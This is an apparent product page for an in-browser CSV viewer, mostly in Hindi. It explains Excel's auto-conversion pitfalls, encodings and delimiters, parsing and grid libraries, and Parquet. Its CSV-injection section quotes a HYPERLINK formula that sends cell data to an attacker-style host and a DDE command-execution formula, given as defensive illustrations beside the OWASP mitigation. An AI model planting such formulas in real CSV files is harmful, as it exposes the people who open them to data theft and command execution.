Does CSV Viewer work with large files?

Yes, since it runs in your browser, it can handle reasonably large inputs. Performance depends on your device's capabilities.

क्या मैं इसे मोबाइल डिवाइस पर उपयोग कर सकता हूँ?

Yes, this tool works on any device with a modern browser including phones and tablets.

क्या यह टूल ऑफ़लाइन काम करता है?

Yes, once the page has loaded, the tool works entirely in your browser without needing an internet connection. All processing is done locally with JavaScript.

Is there a character or line limit?

There is no hard limit. The tool can handle files with tens of thousands of lines, though very large inputs may slow down depending on your browser and device.

मुफ़्त CSV व्यूअर

CSV डेटा को तुरंत देखें, क्रमबद्ध करें और खोजें। ऑटो-डिटेक्शन के साथ कई डिलीमीटर का समर्थन करता है। अपने डेटा का विश्लेषण करने के लिए CSV टेक्स्ट आयात या पेस्ट करें।

CSV टेक्स्ट पेस्ट करें:

CSV अपलोड करें

डिलिमिटर:

आरंभ करने के लिए CSV फ़ाइल अपलोड करें या CSV टेक्स्ट पेस्ट करें।

CSV फ़ाइलों के बारे में

CSV (Comma-Separated Values) सारणीबद्ध डेटा संग्रहीत करने के लिए एक सरल टेक्स्ट प्रारूप है। प्रत्येक पंक्ति एक पंक्ति का प्रतिनिधित्व करती है।

CSV विशेषताएँ:

सार्वभौमिक प्रारूप: Excel, Google Sheets, डेटाबेस और अधिकांश डेटा टूल द्वारा समर्थित
सरल और पोर्टेबल: सादा टेक्स्ट, मानव-पठनीय, किसी भी प्लेटफ़ॉर्म पर काम करता है
उद्धृत फ़ील्ड: कॉमा या लाइन ब्रेक वाले मान उद्धरण चिह्नों में रखे जा सकते हैं
कई डिलिमिटर: कॉमा, सेमीकोलन, टैब या पाइप
वैकल्पिक हेडर: पहली पंक्ति में कॉलम नाम हो सकते हैं

मैं डेटा को CSV में कैसे निर्यात करूँ?

Excel में: सहेजें → CSV (विभाजक: अर्धविराम)। Google Sheets में: फ़ाइल → डाउनलोड → CSV। अधिकांश डेटाबेस में: निर्यात → CSV फ़ॉर्मेट। CSV तालिका डेटा के लिए मानक निर्यात फ़ॉर्मेट है।

मेरे CSV में विशेष वर्ण होने पर क्या?

CSV उद्धरण के माध्यम से विशेष वर्णों को संभालता है। अल्पविराम, उद्धरण या न्यूलाइन वाले क्षेत्रों को दोहरे उद्धरणों से घिरा होना चाहिए। é, ñ या इमोजी जैसे विशेष वर्ण UTF-8 एन्कोडिंग में फ़ाइल का उपयोग करने पर संरक्षित रहते हैं।

ऑटो-डिटेक्शन डिलीमीटर कैसे काम करता है?

यह टूल यह पता लगाने के लिए आपके CSV की पहली पंक्ति का विश्लेषण करता है कि कौन सा डिलीमीटर सबसे नियमित रूप से दिखाई देता है। असामान्य डिलीमीटर के साथ बेहतर परिणामों के लिए, इसे ड्रॉपडाउन में मैन्युअल रूप से चुनें।

"Excel के बिना CSV देखना" अपने आप में एक उपयोग-मामला क्यों है

"मैं CSV कैसे खोलूँ?" का सरल जवाब है "डबल-क्लिक करो; Excel इसे खोल देगा।" यह जवाब उन लोगों के लिए गलत है जिनका एक आश्चर्यजनक हिस्सा वास्तव में CSV देखना चाहता है। कारण चार बकेट में बँटते हैं, और प्रत्येक इस तरह के ब्राउज़र-आधारित व्यूअर पर आने का असली कारण है।

1. Excel खोलते ही डेटा नष्ट कर देता है। सबसे अधिक उद्धृत उदाहरण जीन-नाम की आपदा है, Excel MARCH1 पढ़कर 1-Mar लिख देता है, SEPT2 पढ़कर 2-Sep लिख देता है। HUGO Gene Nomenclature Committee ने Excel से लड़ना छोड़ दिया और 2020 में सत्ताईस मानव जीनों का नाम बदल दिया क्योंकि डेटा भ्रष्टाचार इतना व्यापक था। 2020 का एक PLOS Computational Biology पेपर जिसने 3,597 शोध-पत्र देखे, उसने पाया कि लगभग पाँचवाँ हिस्सा पूरक आनुवांशिक डेटा Excel के स्वतः रूपांतरण से चुपचाप खराब हो चुका था। जीन प्रसिद्ध मामला है पर यही तंत्र अमेरिकी ZIP कोड (01234 बन जाता है 1234), अग्रणी शून्य वाले उत्पाद SKU, संगीत या रसायन में अंश-संकेतन (3/4, 4/4), तारीख-नुमा सीरियल नंबर (1-1, 2-2), टेलीफोन एक्सटेंशन, और वैज्ञानिक संकेतन में खाता संख्या (9180000000000 के बजाय 9.18e+12) को भी निगल जाता है। एक व्यूअर, जो लिखे हुए कच्चे बाइट दिखाता है, सुविधा मात्र नहीं है; यह शुद्धता का एक मूल अवयव है। अगर आपको पुष्टि करनी है कि ग्राहक ID की एक कॉलम निर्यात के बाद भी अक्षुण्ण है, तो आपको ऐसा व्यूअर चाहिए जो पार्स न करे, टाइप-कोएर्शन न करे, "मदद" न करे।

2. मशीन पर Excel ही नहीं है। 2026 में लैपटॉपों का एक छोटा-सा हिस्सा भी ऐसा नहीं है जिसके पास Microsoft 365 लाइसेंस हो। Chromebooks बिना उसके आते हैं; कई Linux इंस्टॉल LibreOffice Calc वापस करते हैं, जिसकी अपनी विचित्रताएँ हैं; कई Mac उपयोगकर्ता CSV को Apple Numbers में खोलते हैं, जो लम्बी पंक्तियों को चुपचाप मोड़ देता है और इसका अपना संख्या-कोएर्शन व्यक्तित्व है। कोई भी जो किसी कंपनी द्वारा जारी मशीन पर, जिस पर सॉफ़्टवेयर इंस्टॉल नहीं कर सकता, या उधार लिए डिवाइस पर, या किओस्क पर फ़ाइल का निरीक्षण करना चाहे, उसे ऐसे टूल की ज़रूरत है जो बिना अनुमतियों के किसी भी ब्राउज़र टैब में चले।

3. फ़ाइल Excel की सीमा से बड़ी है। Excel 2007 ने .xlsx शुरू किया और पंक्ति-सीमा .xls की 65,536 पंक्तियों से उठाकर 1,048,576 पंक्तियाँ (2²⁰) कर दी। कॉलम-सीमा 256 से बढ़कर 16,384 (2¹⁴) हो गई। दो दशक तक यह अधिकांश लोगों के लिए पर्याप्त था। अब बहुतों के लिए पर्याप्त नहीं है। एक मामूली सर्वर लॉग एक हफ़्ते में बीस लाख पंक्तियाँ बना सकता है। एक मध्यम आकार के स्टोर के एक साल के Shopify ऑर्डर निर्यात में दस लाख से ज़्यादा हो सकते हैं। 1 हर्ट्ज़ पर नमूना लेने वाला एक सेंसर रोज़ 86,400 पंक्तियाँ देता है; साल में 3.15 करोड़। Excel का ओवरफ़्लो प्रबंधन कठोर है: वह 1,048,576वीं पंक्ति पर चुपचाप काट देता है और कुछ हुआ ही नहीं ऐसे आगे बढ़ जाता है। कोई चेतावनी पट्टी नहीं। उपयोगकर्ता हफ़्तों बाद, या कभी भी नहीं, गायब पंक्तियाँ खोजता है।

4. मोबाइल। iOS और Android पर स्प्रेडशीट ऐप्स दूसरे दर्जे के नागरिक हैं। Excel का मोबाइल ऐप मौजूद है पर वह एक Microsoft खाते के पीछे बंद है, डेस्कटॉप सुविधाओं का एक छोटा उपसमुच्चय रखता है और फ़ोन पर चौड़ी टेबलों का निरीक्षण कष्टप्रद है। कभी-कभी आपको केवल किसी सहकर्मी द्वारा ईमेल किए गए अटैचमेंट को खोलना है, कुछ पंक्तियाँ देखनी हैं, स्क्रीनशॉट लेना है, और जवाब देना है। एक CSV व्यूअर जो मोबाइल ब्राउज़र में लोड हो, डेटा को स्क्रोल करने योग्य HTML टेबल के रूप में फ़ॉर्मैट करे और कुछ और न करे, उस काम के लिए सर्वोत्तम औज़ार है।

और एक पाँचवाँ, छोटा बकेट: संदेश के लिए स्क्रीनशॉट। अक्सर व्यक्ति वास्तव में तीन-चार पंक्तियों का साफ़-सुथरा विज़ुअल चाहता है, जिसे वे Slack में, टिकट में, ईमेल उत्तर में पेस्ट कर सकें। फ़ाइल को Excel में खोलकर स्क्रीनशॉट लेने पर एक छवि मिलती है जिसमें रिबन, ग्रिडलाइन, सक्रिय सेल चयनकर्ता और शीर्ष पर फ़ाइल-पथ पट्टी होती है, स्क्रीनशॉट का बीस प्रतिशत हिस्सा Excel क्रोम है। ब्राउज़र टैब में रेंडर की गई एक नंगी HTML टेबल सबसे साफ़ संभव स्क्रीनशॉट विषय है।

एक संक्षिप्त इतिहास (वे हिस्से जो देखने के लिए मायने रखते हैं)

पूरा CSV इतिहास साथी text-to-csv पृष्ठ में है, IBM Fortran 1972, दशकों का अनौपचारिक उपयोग, RFC 4180 आख़िरकार अक्टूबर 2005 में Yakov Shafranovich द्वारा प्रकाशित, MIME प्रकार text/csv IANA पर पंजीकृत, W3C Model for Tabular Data and Metadata on the Web (CSVW) 17 दिसंबर 2015 को W3C Recommendation की स्थिति तक पहुँचा (और व्यवहार में अधिकतर उपेक्षित रहा)। देखने के लिए जो ख़ास मायने रखता है वह यह कि इनमें से कोई भी दस्तावेज़ यह तय नहीं करता कि CSV को कैसे प्रदर्शित किया जाए। कोई मानक कॉलम चौड़ाई नहीं, संरेखण कन्वेंशन नहीं, पंक्ति 1 के हेडर होने का नियम नहीं। RFC 4180 लिखने वाले को बताता है कि अल्पविरामों को कैसे एस्केप करें; पाठक को रेंडर करने के बारे में कुछ नहीं बताता। व्यूअर का काम स्पेक से अपरिभाषित है।

हमारे पास जो है वह स्प्रेडशीट सॉफ़्टवेयर से उभरी कन्वेंशन (पाठ बाएँ संरेखित, संख्याएँ दाएँ संरेखित, पहली पंक्ति जमी हुई, पठनीयता के लिए वैकल्पिक पंक्ति रंग) और वेब टेबल से कन्वेंशन (छँटनी योग्य हेडर, स्टिकी पोज़िशनिंग, ग्रिड के ऊपर खोज इनपुट) हैं। एक आधुनिक CSV व्यूअर अनिवार्य रूप से संपादन घटाकर एक स्प्रेडशीट UI है।

लोकेल-सेपरेटर और BOM के जाल

लोकेल-सेपरेटर की अव्यवस्था जो CSV लेखकों को काटती है वह पाठकों को भी काटती है, en-US में अल्पविराम, fr-FR / de-DE / it-IT / es-ES / pt-BR में अर्द्धविराम, अन्यत्र टैब और पाइप। एक व्यूअर जो अल्पविराम को हार्ड-कोड करता है और फ़्रांसीसी "CSV" को प्रति पंक्ति एकल कॉलम के रूप में रेंडर करता है, आरंभ से ही टूटा है। इस टूल का "ऑटो-डिटेक्ट" डिफ़ॉल्ट मैन्युअल ओवरराइड के साथ सही डिज़ाइन है: समझदारी की कोशिश करो, पर जब हेउरिस्टिक विफल हो (और होगा, उन फ़ाइलों पर जिनमें एक ही कॉलम के सभी मानों में अल्पविराम होता है), उपयोगकर्ता चुन सकता है।

बाइट-ऑर्डर मार्क, UTF-8 फ़ाइल की शुरुआत में तीन बाइट EF BB BF, U+FEFF एन्कोड करते हुए, इसलिए मौजूद है क्योंकि Windows पर Excel इसके बिना UTF-8 पहचानने से मना कर देता है। एक विनम्र CSV लेखक Excel-friendly होने के लिए BOM जोड़ता है; लागत हर दूसरे पाठक पर गिरती है। लगभग हर कमांड-लाइन टूल, awk, cut, head, tail, पुराने sed, BOM को पहले फ़ील्ड का हिस्सा मानते हैं। एक कॉलम हेडर जिसे name पढ़ा जाना चाहिए, name पढ़ा जाता है। Python का अंतर्निर्मित csv मॉड्यूल BOM नहीं हटाता जब तक फ़ाइल utf-8-sig कोडेक से न खुले; दस लाख ट्यूटोरियल सादे utf-8 का उपयोग करते हैं और चुपचाप टूटे पार्सर पैदा करते हैं। अगर आप पहली कॉलम हेडर से पहले एक अजीब वर्ण देखते हैं, यह UTF-8 बाइट-ऑर्डर मार्क है, फ़ाइल में बग नहीं, बस एन्कोडर और डिकोडर के बीच मेल नहीं।

Excel के चार CSV संस्करण

Excel का Save As डायलॉग चार "CSV" प्रारूप पेश करता है, और लेबल भ्रामक हैं। "Comma delimited" लेबल असल में उपयोगकर्ता के लोकेल का सूची विभाजक उपयोग करते हैं, जो महाद्वीपीय यूरोप और लैटिन अमेरिका के अधिकांश हिस्सों में अर्द्धविराम है।

CSV (Comma delimited): उपयोगकर्ता के लोकेल का सूची विभाजक उपयोग करता है, ANSI कोड पेज, कोई BOM नहीं, CRLF।
CSV UTF-8 (Comma delimited): Excel 2016 में जोड़ा गया, चारों में से एकमात्र जो UTF-8 (BOM के साथ) उपयोग करता है।
CSV (Macintosh): MacRoman एन्कोडिंग, classic-Mac के केवल-CR लाइन एंडिंग, बड़े पैमाने पर अप्रचलित पर अभी भी सामने आता है।
CSV (MS-DOS): OEM कोड पेज (en-US में CP437, पश्चिमी यूरोप में CP850)।

जो व्यूअर हर संस्करण पर "बस काम" करना चाहता है, उसे एन्कोडिंग (UTF-8 ± BOM, BOM के साथ UTF-16, Windows-1252, ISO-8859-1, MacRoman, Shift_JIS, GBK), लाइन एंडिंग (CRLF / LF / CR), विभाजक (अल्पविराम / अर्द्धविराम / टैब / पाइप / कस्टम), उद्धरण शैली (RFC 4180 दोहरी-उद्धरण, बैकस्लैश, कोई नहीं), और हेडर उपस्थिति का पता लगाना होगा। इन सबको विश्वसनीय रूप से डिटेक्ट करना वास्तव में कठिन है। व्यावहारिक तरीक़ा है: जो डिटेक्ट कर सको करो, बाक़ी के लिए मैन्युअल ओवरराइड एक्सपोज़ करो, और कभी चुपचाप विफल मत हो। यह टूल विभाजक को मैन्युअल रूप से एक्सपोज़ करता है, जो सबसे सामान्य आश्चर्य को संभालता है। यह वर्तमान में एन्कोडिंग एक्सपोज़ नहीं करता, Windows-1252 के रूप में निर्यातित उच्चारण वर्णों वाला एक फ़्रांसीसी CSV मोजिबाके (é के बजाय Ã©) प्रदर्शित करेगा जब तक इसके लिए भी उचित ओवरराइड न आ जाए।

ब्राउज़र-साइड पार्सिंग, लाइब्रेरियाँ

प्रमुख क्लाइंट-साइड CSV लाइब्रेरी PapaParse है, जिसे Matt Holt ने 2013 में बनाया और वर्तमान में GitHub पर लगभग 13.4k स्टार्स हैं। इसका टैगलाइन, "the fastest in-browser CSV parser", अतिशयोक्ति नहीं है। यह RFC 4180 अनुपालक, MIT-लाइसेंस-प्राप्त, निर्भरता-मुक्त है, और सिंक्रोनस स्ट्रिंग पार्सिंग, FileReader के माध्यम से अनसिंक्रोनस फ़ाइल पार्सिंग, RAM से बड़ी फ़ाइलों के लिए स्ट्रीमिंग चंक-दर-चंक पार्सिंग, और UI को उत्तरदायी रखने के लिए वर्कर-थ्रेड पार्सिंग का समर्थन करती है। PapaParse किसी भी ब्राउज़र-साइड CSV टूल में डिफ़ॉल्ट है, जब तक कि न करने का कोई विशेष कारण न हो।

Node पक्ष पर, कैनोनिकल विकल्प csv-parse है (Adaltas, पहली रिलीज़ 2010), युद्ध-परीक्षित, कॉलबैक-आधारित और स्ट्रीम-आधारित दोनों API एक्सपोज़ करती है। mafintosh द्वारा csv-parser सुविधा-चौड़ाई के मुक़ाबले कच्चे थ्रूपुट को प्राथमिकता देती है। fast-csv (C2FO) उन टीमों के लिए TypeScript-निर्मित पार्सर-और-फ़ॉर्मैटर जोड़ी है जो एक ही लाइब्रेरी में पढ़ना और लिखना दोनों चाहते हैं।

RAM से बड़ी फ़ाइलों के लिए स्ट्रीमिंग

ब्राउज़र में सरल CSV पठन FileReader.readAsText(file) का उपयोग करता है, जो onload आह्वान करने से पहले पूरी फ़ाइल को मेमोरी में पढ़ता है। एक सौ-मेगाबाइट फ़ाइल के लिए, यह एक सौ मेगाबाइट JavaScript हीप है। एक-गीगाबाइट फ़ाइल के लिए, अधिकांश उपभोक्ता हार्डवेयर पर ब्राउज़र टैब मेमोरी से बाहर हो जाएगा या रुक जाएगा।

आधुनिक विकल्प है Streams API, Chrome 71 और Firefox 65 से File.prototype.stream() के रूप में उपलब्ध। file.stream() कॉल करना एक ReadableStream<Uint8Array> लौटाता है जो फ़ाइल के बाइट चंक्स में देता है। उपभोक्ता स्ट्रीम से पढ़ता है, प्रत्येक चंक को TextDecoder के माध्यम से डिकोड करता है (stream: true फ़्लैग के साथ ताकि चंक सीमाओं को पार करने वाले मल्टी-बाइट UTF-8 अनुक्रम सही ढंग से जुड़ें), और पाठ को स्ट्रीमिंग पार्सर में डालता है। PapaParse अपने step या chunk कॉलबैक के माध्यम से सीधे स्ट्रीम ले सकता है। परिणाम है मनमाने आकार की फ़ाइलों का स्थिर-मेमोरी पार्सिंग।

व्यूअर के लिए केवल स्ट्रीमिंग पर्याप्त नहीं है, रेंडर की गई टेबल को भी वर्चुअलाइज़ करना होगा, अन्यथा एक करोड़ <tr> तत्वों को रेंडर करना पार्सिंग सफल होने पर भी पृष्ठ को क्रैश कर देगा। मानक आर्किटेक्चर पैटर्न: लोड पर IndexedDB में स्ट्रीम-पार्स, स्क्रॉल पर IndexedDB से वर्चुअलाइज़्ड रेंडर। यह टूल वर्तमान में दहाई मेगाबाइट की निचली सीमा में फ़ाइलों के लिए अनुकूलित है, उस सामान्य "मैं बस इस फ़ाइल को देखना चाहता हूँ" वर्कफ़्लो के लिए जो लगभग सभी को कवर करता है। मल्टी-गीगाबाइट CSV के लिए, Visidata, DuckDB CLI के FROM क्लॉज या csvkit के csvlook जैसे डेस्कटॉप उपकरण देखें।

छँटाई, फ़िल्टरिंग, पिवटिंग, JavaScript ग्रिड परिदृश्य

एक बार डेटा पृष्ठ पर आ जाने पर, उपयोगकर्ता तीन चीज़ें करना चाहता है: कॉलम के अनुसार छाँटना, पंक्तियाँ फ़िल्टर करना, कभी-कभी पिवट करना। ब्राउज़र DOM में इन्हें फिर से लागू करने वाली JavaScript लाइब्रेरियों का एक पूरा उद्योग है:

Allan Jardine की DataTables.js (काम 2008 में शुरू, SpryMedia 2011 में स्थापित) कुलपिता है। किसी भी HTML <table> को लें, छँटनी योग्य हेडर, इंस्टेंट-सर्च इनपुट, पेजिनेशन और कॉलम-दिखाओ/छुपाओ नियंत्रण पाएँ। मूल रूप से jQuery-आधारित; प्लग-इन के रूप में बढ़िया चलता है। दहाई हज़ार पंक्तियों तक आरामदायक; सैकड़ों हज़ार के लिए पेजिनेशन भार-वहन करने वाला बन जाता है।
Niall Crosby की AG Grid (2015, लंदन ट्रेडिंग फ़्लोर पर ग्रिडों से Crosby की कुंठा से उपजी) भारी-भरकम है। DOM वर्चुअलाइज़ेशन के इर्द-गिर्द बनी, केवल व्यूपोर्ट में दिखने वाली पंक्तियाँ ही वास्तव में रेंडर होती हैं, इसलिए यह एक ही स्क्रॉलबार के साथ आराम से दस लाख पंक्तियाँ दिखा सकती है। मुफ़्त Community Edition (MIT) के साथ-साथ भुगतान वाला Enterprise Edition (पिवट टेबल, उन्नत फ़िल्टर, एकीकृत चार्ट, सर्वर-साइड पंक्ति मॉडल)। "मैं एक गंभीर डेटा टूल बना रहा हूँ जिसे ब्राउज़र में Excel जैसा दिखना है" का डिफ़ॉल्ट विकल्प।
Oli Folkerd की Tabulator आधुनिक निर्भरता-मुक्त विकल्प है। 4.0 संस्करण (2018) ने jQuery सहित सभी निर्भरताएँ छोड़ दीं; "DataTables बहुत jQuery-शैली है" और "AG Grid बहुत अधिक है" के बीच के स्वीट स्पॉट पर बैठा है।

विशेष रूप से पिवट के लिए, Nicolas Kruchten की PivotTable.js सबसे अधिक उद्धृत JS लाइब्रेरी है; AG Grid Enterprise का पिवट मोड वाणिज्यिक विकल्प है। पिवट एक भारी संक्रिया है, अक्सर डेटा को ऐसे टूल पर निर्यात करना बेहतर है जो उसे पहले अनुक्रमित कर सके।

विश्लेषणात्मक भारों के लिए CSV बनाम Apache Parquet

CSV के टिके रहने का कारण सांस्कृतिक और जड़त्व-जन्य है, तकनीकी नहीं। गंभीर विश्लेषण के लिए, जिस प्रारूप ने CSV का दोपहर का भोजन खा लिया है वह है Apache Parquet, एक बाइनरी कॉलमर प्रारूप जो मूल रूप से 2013 में Twitter और Cloudera के इंजीनियरों ने मिलकर विकसित किया, 27 अप्रैल 2015 को Apache Software Foundation के टॉप-लेवल प्रोजेक्ट के रूप में स्वीकार किया गया। Parquet डेटा को पंक्ति-दर-पंक्ति के बजाय कॉलम-दर-कॉलम संग्रहीत करता है, यही उलटाव विश्लेषण के लिए मायने रखता है: SELECT AVG(price) FROM big_table जैसी क्वेरी डिस्क से केवल price कॉलम पढ़ती है, हर दूसरे कॉलम को पूरी तरह छोड़ देती है। CSV के साथ, वही क्वेरी फ़ाइल के हर बाइट को पढ़ने को बाध्य है।

Parquet स्कीमा मेटाडेटा भी ले जाता है (इसलिए टाइप स्पष्ट हैं, अनुमानित नहीं), कॉलमर संपीड़न का उपयोग करता है जो असंपीड़ित CSV पर नियमित रूप से 5-10x अनुपात प्राप्त करता है, और प्रिडिकेट पुशडाउन का समर्थन करता है ताकि इंजन कॉलम सांख्यिकी के आधार पर पूरे पंक्ति समूह छोड़ सकें। यह Snowflake, BigQuery, Databricks, Amazon Athena और मूल रूप से हर आधुनिक क्लाउड डेटा वेयरहाउस और लेकहाउस पर डिफ़ॉल्ट फ़ाइल प्रारूप है। यदि आप गीगाबाइट-स्केल की एक ही फ़ाइल को बार-बार देख रहे हैं, तो Parquet पर विचार करें, यह तेज़ और छोटा है और लगभग हर आधुनिक डेटा टूल इसे मूल रूप से पढ़ता है। आज CSV को सबसे अच्छी तरह से मनुष्यों और उपभोक्ता सॉफ़्टवेयर की लंबी पूँछ के बीच आदान-प्रदान प्रारूप के रूप में समझा जाता है, जबकि Parquet मशीनों के बीच का भंडारण प्रारूप है।

CSV इंजेक्शन, सुरक्षा पहलू

CSV इंजेक्शन, कभी-कभी फ़ॉर्मूला इंजेक्शन भी कहा जाता है, वह हमला है जहाँ CSV सेल का मान =, +, - या @ से शुरू होता है, जिससे Excel और Google Sheets फ़ाइल खुलने पर उसे फ़ॉर्मूला मान लेते हैं। OWASP ने इसे कम से कम 2014 से दर्ज किया है। पाठ्यपुस्तक उदाहरण है =2+5 शाब्दिक पाठ के बजाय 7 के रूप में दिखना। खतरनाक उदाहरण है =HYPERLINK("https://evil.example/log?d="&A1, "Click for results") जो क्लिक होने पर सेल A1 की सामग्री को हमलावर तक भेज देता है। वास्तव में खतरनाक उदाहरण था =cmd|'/c calc'!A0, जो कुछ Excel संस्करणों पर DDE के माध्यम से मनमाने आदेश चला सकता था, Microsoft के 2018 के डिफ़ॉल्ट-DDE परिवर्तनों से काफ़ी हद तक कम हुआ, पर कुछ कॉन्फ़िगरेशनों में अब भी मौजूद है।

OWASP मार्गदर्शन के अनुसार मानक शमन: उपयोगकर्ता-प्रस्तुत पाठ से CSV उत्पन्न करते समय, =, +, -, @, टैब या कैरिज-रिटर्न से शुरू होने वाले किसी भी सेल को एकल उद्धरण से उपसर्ग करें। व्यूअर इस हमले का प्राप्तकर्ता छोर है, उत्पन्न करने वाला नहीं, पर अगर आपने यहाँ ऐसा CSV खोला जिसमें फ़ॉर्मूला-उपसर्ग वाले सेल हैं, यह एक मज़बूत संकेत है कि उन सेलों को पहले बदले बिना उसी फ़ाइल को Excel में मत खोलिए। पहले व्यूअर में निरीक्षण करने का पूरा उद्देश्य ठीक इसी प्रकार के जाल को पकड़ना है।

वास्तविक दुनिया में लोग इस तरह का व्यूअर कहाँ खोलते हैं

बैंक या फिनटेक स्टेटमेंट CSV। अधिकांश खुदरा बैंक ग्राहकों को एक साल का लेन-देन इतिहास CSV के रूप में डाउनलोड करने देते हैं। ग्राहक बजटिंग ऐप, टैक्स टूल या अकाउंटेंट की स्प्रेडशीट में आयात करने से पहले फ़ाइल देखना चाहते हैं, तारीख़ की सीमा सत्यापित करना, लेन-देन गिनना, किसी विशिष्ट व्यापारी की खोज करना।
IoT और सेंसर डेटा निर्यात। मौसम स्टेशन CSV, मृदा-आर्द्रता सेंसर लॉग, स्मार्ट-होम बिजली मीटर निर्यात। अक्सर हज़ारों पंक्तियाँ। उपयोगकर्ता यह पुष्टि कर रहा है कि किसी विशेष अंतराल के दौरान सैंपलिंग जारी रही और कोई अंतराल नहीं हैं।
सर्वर लॉग डंप। Apache combined लॉग प्रारूप को CSV में परिवर्तित किया गया, logger -t के माध्यम से निर्यातित syslog रिकॉर्ड, S3 को भेजे और निरीक्षण के लिए डाउनलोड किए गए एप्लिकेशन लॉग।
CRM और SaaS निर्यात। Salesforce Account निर्यात, HubSpot संपर्क, Stripe ग्राहक, Mailchimp ऑडियंस, Shopify ऑर्डर, Notion डेटाबेस। हर SaaS प्लैटफ़ॉर्म का अपना CSV प्रारूप और विचित्रताएँ हैं। उपयोगकर्ता बल्क-संपादन, पुनः-आयात या किसी सहयोगी को फ़ाइल सौंपने से पहले निरीक्षण कर रहा है।
सर्वे प्रतिक्रियाएँ। Google Forms, SurveyMonkey, Typeform, Qualtrics, सब डिफ़ॉल्ट रूप से CSV निर्यात करते हैं। शोधकर्ता खुले-पाठ की प्रतिक्रियाएँ देखना चाहते हैं, वितरण का अनुमान लगाना, सत्यापित करना कि कुछ भी ख़ाली नहीं है।
सार्वजनिक-डेटा डाउनलोड। सरकारी ओपन-डेटा पोर्टल (data.gov, data.gov.uk, EU Open Data Portal), Wikipedia डेटा निर्यात, वैज्ञानिक डेटा भंडार। CSV सार्वभौमिक हर है।
बल्क-इम्पोर्ट तैयारी। उपयोगकर्ता ने हाथ से या किसी अन्य टूल से एक CSV जोड़ा है और उस सिस्टम में अपलोड करने से पहले यह सत्यापित करना चाहता है कि वह अच्छी तरह से बना है जो ग़लत पंक्तियों को चुपचाप ठुकरा देगा। व्यूअर सूखा-दौड़ है।
विरासत। एक सहयोगी ने एक CSV भेजा है। उपयोगकर्ता को नहीं पता उसमें क्या है। वह उसमें झाँकना चाहता है इससे पहले कि तय करे कि उससे और गहराई से जुड़ना है या नहीं।

और सवाल

यह कितनी बड़ी फ़ाइल खोल सकता है?

वर्तमान कार्यान्वयन दहाई मेगाबाइट की निचली सीमा में फ़ाइलों के साथ आरामदायक है, जो ब्राउज़र मेमोरी में आसानी से समाती हैं और एक उचित HTML टेबल के रूप में रेंडर होती हैं। सैकड़ों मेगाबाइट या उससे बड़ी फ़ाइलों के लिए, पृष्ठ धीमा हो जाएगा; गीगाबाइट की फ़ाइलों के लिए, ब्राउज़र टैब मेमोरी से बाहर हो सकता है और क्रैश हो सकता है। बहुत बड़े CSV के लिए, Visidata, csvkit के csvlook या DuckDB CLI के FROM 'file.csv' SELECT जैसे डेस्कटॉप उपकरण देखें।

मेरा CSV एक विशाल कॉलम जैसा क्यों दिखता है?

ऑटो-डिलिमिटर डिटेक्शन ने ग़लत अनुमान लगाया। यह सबसे सामान्य तब होता है जब फ़ाइल अर्द्धविराम (महाद्वीपीय यूरोप का अधिकांश), टैब (CSV के रूप में ग़लत लेबल वाली TSV फ़ाइलें), या पाइप (कुछ डेटाबेस निर्यात) का उपयोग करती है। डिलिमिटर ड्रॉपडाउन को सही वर्ण पर स्विच करें, अक्सर फ़ाइल एक्सटेंशन और वास्तविक सामग्री असहमत होते हैं।

मेरे उच्चारण वर्ण कूड़ा जैसे दिखते हैं। क्या ग़लत है?

एन्कोडिंग मेल नहीं, फ़ाइल Windows-1252 (या किसी अन्य ग़ैर-UTF-8 एन्कोडिंग) में एन्कोडेड है और टूल इसे UTF-8 के रूप में व्याख्या कर रहा है। क्लासिक लक्षण है é का Ã© के रूप में दिखना। वर्तमान व्यूअर एन्कोडिंग ओवरराइड एक्सपोज़ नहीं करता, पर आप फ़ाइल को किसी भी आधुनिक टेक्स्ट एडिटर (Notepad++, VS Code, BBEdit, gedit, यहाँ तक कि हाल के Windows पर Notepad) में UTF-8 के रूप में फिर से सहेज सकते हैं और इसे यहाँ फिर खोल सकते हैं।

मुझे इसे उपयोग करना चाहिए या बस Excel में खोलना चाहिए?

यदि आपके CSV में केवल वही डेटा है जिसे Excel दुर्घटनावश ख़राब नहीं कर सकता, शुद्ध गद्य पाठ कॉलम, सामान्य परिसर में सादे पूर्णांक, Excel के अपेक्षित प्रारूप में तारीख़ें, तो Excel ठीक है और संपादन उपकरण समृद्धतर हैं। यदि आपके CSV में कुछ भी ऐसा है जो Excel फिर से लिख सकता है (जीन नाम, अग्रणी शून्य वाले ZIP कोड, 3/4 जैसे अंश, वैज्ञानिक संकेतन में दिखने वाली स्ट्रिंग, कुछ भी जिसे आपको बाइट-दर-बाइट सुरक्षित रखना है), तो Excel को उसे छूने देने से पहले व्यूअर में खोलकर पुष्टि करें कि वास्तव में उसमें क्या है। यहाँ खोलने में आपका जो एक घंटा लगता है वह सप्ताह बाद यह पता चलने से बहुत सस्ता है कि Excel ने आपका जीन-समूह बदल दिया।